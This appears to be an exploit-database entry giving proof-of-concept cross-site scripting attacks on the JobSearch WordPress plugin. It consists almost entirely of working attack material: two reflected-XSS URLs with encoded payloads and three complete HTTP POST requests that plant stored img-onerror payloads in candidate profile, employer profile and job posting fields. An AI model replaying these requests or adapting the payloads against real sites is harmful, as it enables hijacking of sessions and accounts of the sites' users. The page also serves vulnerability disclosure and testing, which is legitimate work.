Share
## https://sploitus.com/exploit?id=WPEX-ID:10290
### [ PoC Unauthenticated Reflected XSS: ]

https://eyecix.com/plugins/jobsearch/?location=%22%20autofocus%20onfocus%3Dalert%28%60XSS%60%29%3B%20%22%3E
https://eyecix.com/plugins/jobsearch/?sector_cat=%22--%3E%3C%21--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28%60XSS%60%29%3B%2F%2F%22%3E1%22--%3E



### [ PoC Authenticated Persistent XSS -> Candidate User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------27142012921130118151484572765
Content-Length: 6644
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_cvr_photo_cand"; filename=""
Content-Type: application/octet-stream


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_user_dob_whole"



-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_phone"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="dial_code"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_sector"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_candidate_jobtitle"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_type"

type_1
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_currency"

default
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_pos"

left
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_sep"

,
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="candidate_salary_deci"

2
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_bio"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="academic-level"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="Age"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="salary"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="gender"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="industry"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_facebook_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_twitter_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_linkedin_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="cand_user_dribbble_url"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_address"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------27142012921130118151484572765
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------27142012921130118151484572765--



### [ PoC Authenticated Persistent XSS -> Employer User Profile: ]

[!] POST /plugins/jobsearch/user-dashboard/?tab=dashboard-settings HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------321608141216835281602774802175
Content-Length: 6868
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/user-dashboard/?tab=dashboard-settings
Cookie: [cookies_here]

-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_cvr_photo"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_firstname"

Vlad
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="u_lastname"

Vector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="display_name"

PoC
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_profile_slug"

vladvector
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_user_public_pview"

yes
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_phone"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="dial_code"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="contry_iso_code"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_website"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_sector"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_mm"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_dd"

1
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_dob_yy"

1900
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_bio"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="founded-since"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_facebook_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_twitter_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_linkedin_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="emp_user_dribbble_url"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lat"

37.090240
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_lng"

-95.712891
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_location_zoom"

12
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_title[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_designation[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_experience[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="team_image"; filename=""
Content-Type: application/octet-stream


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_image[]"


-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_facebook[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_google[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`)//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_twitter[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_linkedin[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="jobsearch_field_team_description[]"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------321608141216835281602774802175
Content-Disposition: form-data; name="user_settings_form"

1
-----------------------------321608141216835281602774802175--



### [ PoC Authenticated Persistent XSS -> Job Page: ]

[!] POST /plugins/jobsearch/post-new-jobs/ HTTP/1.1
Host: eyecix.com
Content-Type: multipart/form-data; boundary=---------------------------35378657672420857749655614298
Content-Length: 5216
Origin: https://eyecix.com
Referer: https://eyecix.com/plugins/jobsearch/post-new-jobs/
Cookie: [cookies_here]

-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_title"

PoC
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_detail"

1337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="application_deadline"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_sector"

12
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_type"

4
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="get_job_skills[]"

poc
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_type"

internal
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_url"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_apply_email"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_type"

type_1
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_max_salary"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_currency"

default
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_pos"

left
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_sep"

,
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_salary_deci"

2
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="offered-salary"

31337"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="career-level"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="experience"

4-years"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="gender"

male"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="Industry"

graphics-designing"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="qualifications"

masters-degree"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="job_attach_files[]"; filename=""
Content-Type: application/octet-stream


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location1"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location2"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_location3"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_address"

"--><!--<img src="--><img src=x onerror=(alert)(`XSS`);//">1"-->
-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lat"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_lng"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="jobsearch_field_location_zoom"


-----------------------------35378657672420857749655614298
Content-Disposition: form-data; name="user_job_posting"

1
-----------------------------35378657672420857749655614298--